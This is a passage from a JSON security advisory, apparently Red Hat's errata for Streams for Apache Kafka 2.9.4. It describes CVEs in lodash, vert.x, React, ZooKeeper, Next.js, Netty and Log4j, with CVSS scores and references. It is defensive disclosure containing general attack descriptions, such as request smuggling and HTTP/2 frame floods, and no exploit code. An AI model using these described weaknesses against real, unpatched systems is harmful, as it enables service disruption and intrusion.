"discovery_date": "2026-03-31T20:01:21.918257+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453496"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the context of Red Hat Enterprise Linux, the grafana and grafana-pcp packages execute the affected JavaScript entirely client-side within the user\u0027s browser. Consequently, the attack surface is strictly restricted to the local browser environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4800"
},
{
"category": "external",
"summary": "RHBZ#2453496",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4800",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"
}
],
"release_date": "2026-03-31T19:25:55.987000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports"
},
{
"cve": "CVE-2026-6860",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-06T10:01:43.929832+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466990"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in eclipse-vertx/vert.x. A remote attacker can exploit this vulnerability by performing a Transport Layer Security (TLS) handshake and presenting a server name extension with a server wildcard name. This can lead to a denial of service (DoS) condition, impacting the availability of the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "eclipse-vertx/vert.x: eclipse-vertx/vert.x: Denial of Service via TLS handshake with wildcard server name",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as Moderate because a remote attacker can trigger a denial of service in Red Hat products that use `eclipse-vertx/vert.x` and are configured with TLS wildcard server names. Exploitation occurs during the TLS handshake, impacting service availability without affecting data confidentiality or integrity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-6860"
},
{
"category": "external",
"summary": "RHBZ#2466990",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466990"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-6860",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6860"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-6860",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6860"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vert.x/pull/6102",
"url": "https://github.com/eclipse-vertx/vert.x/pull/6102"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vert.x/security/advisories/GHSA-3g76-f9xq-8vp6",
"url": "https://github.com/eclipse-vertx/vert.x/security/advisories/GHSA-3g76-f9xq-8vp6"
},
{
"category": "external",
"summary": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/381",
"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/381"
}
],
"release_date": "2026-05-06T09:55:12.531000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "eclipse-vertx/vert.x: eclipse-vertx/vert.x: Denial of Service via TLS handshake with wildcard server name"
},
{
"cve": "CVE-2026-23864",
"cwe": {
"id": "CWE-1284",
"name": "Improper Validation of Specified Quantity in Input"
},
"discovery_date": "2026-01-26T20:01:54.396535+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433059"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in React Server Components. A remote attacker can exploit this vulnerability by sending specially crafted HTTP requests to Server Function endpoints. This can lead to a Denial of Service (DoS), causing server crashes, out-of-memory exceptions, or excessive CPU usage, thereby impacting the availability of applications.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "react-server-dom-webpack: react-server-dom-parcel: reactreact-server-dom-turbopack: React Server Components: Denial of Service via specially crafted HTTP requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23864"
},
{
"category": "external",
"summary": "RHBZ#2433059",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433059"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23864",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23864"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23864"
},
{
"category": "external",
"summary": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
"url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg"
},
{
"category": "external",
"summary": "https://www.facebook.com/security/advisories/cve-2026-23864",
"url": "https://www.facebook.com/security/advisories/cve-2026-23864"
}
],
"release_date": "2026-01-26T19:16:38.250000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "react-server-dom-webpack: react-server-dom-parcel: reactreact-server-dom-turbopack: React Server Components: Denial of Service via specially crafted HTTP requests"
},
{
"cve": "CVE-2026-24281",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2026-03-07T09:00:57.868082+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445449"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache ZooKeeper. The ZKTrustManager component\u0027s hostname verification process can fall back to reverse DNS (PTR) lookup when IP Subject Alternative Name (SAN) validation fails. This vulnerability allows an attacker who can control or spoof PTR records to impersonate ZooKeeper servers or clients, provided they possess a valid certificate for the PTR name. This could lead to unauthorized access or manipulation of ZooKeeper services.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Apache ZooKeeper: Apache ZooKeeper: Impersonation of servers or clients via reverse DNS spoofing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24281"
},
{
"category": "external",
"summary": "RHBZ#2445449",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445449"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24281"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24281",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24281"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/088ddsbrzhd5lxzbqf5n24yg0mwh9jt2",
"url": "https://lists.apache.org/thread/088ddsbrzhd5lxzbqf5n24yg0mwh9jt2"
}
],
"release_date": "2026-03-07T08:50:32.525000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable reverse DNS lookup in Apache ZooKeeper\u0027s client and quorum protocols. This can be achieved by configuring the `zookeeper.ssl.hostnameVerification.disableReverseDns` property to `true`. This configuration option is available in Apache ZooKeeper versions 3.8.6 and 3.9.5 and later. A restart of the ZooKeeper service will be required for the change to take effect.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Apache ZooKeeper: Apache ZooKeeper: Impersonation of servers or clients via reverse DNS spoofing"
},
{
"cve": "CVE-2026-24308",
"cwe": {
"id": "CWE-117",
"name": "Improper Output Neutralization for Logs"
},
"discovery_date": "2026-03-07T09:01:03.859129+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445451"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache ZooKeeper. Improper handling of configuration values in ZKConfig allows an attacker to expose sensitive information. This occurs when sensitive client configuration values are logged at an INFO level in the client\u0027s logfile. This vulnerability can lead to information disclosure, potentially revealing critical system details to unauthorized parties.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Apache ZooKeeper: Apache ZooKeeper: Information disclosure via improper handling of configuration values",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24308"
},
{
"category": "external",
"summary": "RHBZ#2445451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445451"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24308",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24308"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24308",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24308"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/qng3rtzv2pqkmko4rhv85jfplkyrgqdr",
"url": "https://lists.apache.org/thread/qng3rtzv2pqkmko4rhv85jfplkyrgqdr"
}
],
"release_date": "2026-03-07T08:51:17.567000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Apache ZooKeeper: Apache ZooKeeper: Information disclosure via improper handling of configuration values"
},
{
"cve": "CVE-2026-27980",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-18T01:01:36.393672+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448509"
}
],
"notes": [
{
"category": "description",
"text": "An unbounded disk usage flaw has been discovered in Next.js. The default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27980"
},
{
"category": "external",
"summary": "RHBZ#2448509",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448509"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27980"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27980",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27980"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd",
"url": "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/releases/tag/v16.1.7",
"url": "https://github.com/vercel/next.js/releases/tag/v16.1.7"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8"
}
],
"release_date": "2026-03-18T00:23:34.862000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage"
},
{
"cve": "CVE-2026-33870",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-03-27T21:01:59.865839+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452453"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker could exploit this vulnerability by sending specially crafted HTTP/1.1 chunked transfer encoding extension values. Due to incorrect parsing of quoted strings, this flaw enables request smuggling attacks, potentially allowing an attacker to bypass security controls or access unauthorized information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.netty/netty-codec-http: Netty: Request smuggling via incorrect parsing of HTTP/1.1 chunked transfer encoding extension values",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33870"
},
{
"category": "external",
"summary": "RHBZ#2452453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452453"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8",
"url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"
},
{
"category": "external",
"summary": "https://w4ke.info/2025/06/18/funky-chunks.html",
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
},
{
"category": "external",
"summary": "https://w4ke.info/2025/10/29/funky-chunks-2.html",
"url": "https://w4ke.info/2025/10/29/funky-chunks-2.html"
},
{
"category": "external",
"summary": "https://www.rfc-editor.org/rfc/rfc9110",
"url": "https://www.rfc-editor.org/rfc/rfc9110"
}
],
"release_date": "2026-03-27T19:54:15.586000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "io.netty/netty-codec-http: Netty: Request smuggling via incorrect parsing of HTTP/1.1 chunked transfer encoding extension values"
},
{
"cve": "CVE-2026-33871",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-27T21:02:13.396015+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452456"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server\u0027s lack of a limit on these frames, coupled with a bypass of size-based mitigations using zero-byte frames, allows an attacker to consume excessive CPU resources. This can render the server unresponsive with minimal bandwidth usage.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Netty: Denial of Service via HTTP/2 CONTINUATION frame flood",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This important vulnerability in Netty HTTP/2 servers allows a remote attacker to cause a Denial of Service by sending a flood of CONTINUATION frames. This can lead to excessive CPU consumption and render the server unresponsive. Red Hat products utilizing affected Netty versions, such as Red Hat AMQ, Enterprise Application Platform, and OpenShift Container Platform components, are impacted if configured to use HTTP/2.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33871"
},
{
"category": "external",
"summary": "RHBZ#2452456",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452456"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv"
}
],
"release_date": "2026-03-27T19:55:23.135000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: Netty: Denial of Service via HTTP/2 CONTINUATION frame flood"
},
{
"cve": "CVE-2026-34480",
"cwe": {
"id": "CWE-168",
"name": "Improper Handling of Inconsistent Special Elements"
},
"discovery_date": "2026-04-10T16:02:17.024798+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2457328"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Log4j Core. The XmlLayout component, responsible for formatting log messages into XML, does not properly remove or replace characters that are not allowed in XML 1.0. When log messages or diagnostic information contain these forbidden characters, the resulting XML output becomes invalid. This can lead to two main issues: either systems processing these logs will fail to read the affected records, or the logging process itself will stop delivering events, both resulting in a denial of service for logging operations.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "org.apache.logging.log4j/log4j-core: Apache Log4j Core: Invalid XML output causes denial of service in logging",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in Apache Log4j Core\u0027s XmlLayout component can lead to a denial of service in logging operations when log messages contain characters forbidden by the XML 1.0 specification. Systems processing these logs may fail to read records or the logging process may cease event delivery, impacting monitoring and auditing capabilities in affected Red Hat products. Red Hat products in their default configurations will be able to automatically recover, but some log messages may be lost.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34480"
},
{
"category": "external",
"summary": "RHBZ#2457328",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457328"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34480",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34480"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34480",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34480"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/4077",
"url": "https://github.com/apache/logging-log4j2/pull/4077"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb",
"url": "https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb"
},
{
"category": "external",
"summary": "https://logging.apache.org/cyclonedx/vdr.xml",
"url": "https://logging.apache.org/cyclonedx/vdr.xml"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout",
"url": "https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout"
},
{
"category": "external",
"summary": "https://logging.apache.org/security.html#CVE-2026-34480",
"url": "https://logging.apache.org/security.html#CVE-2026-34480"
}
],
"release_date": "2026-04-10T15:42:03.843000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
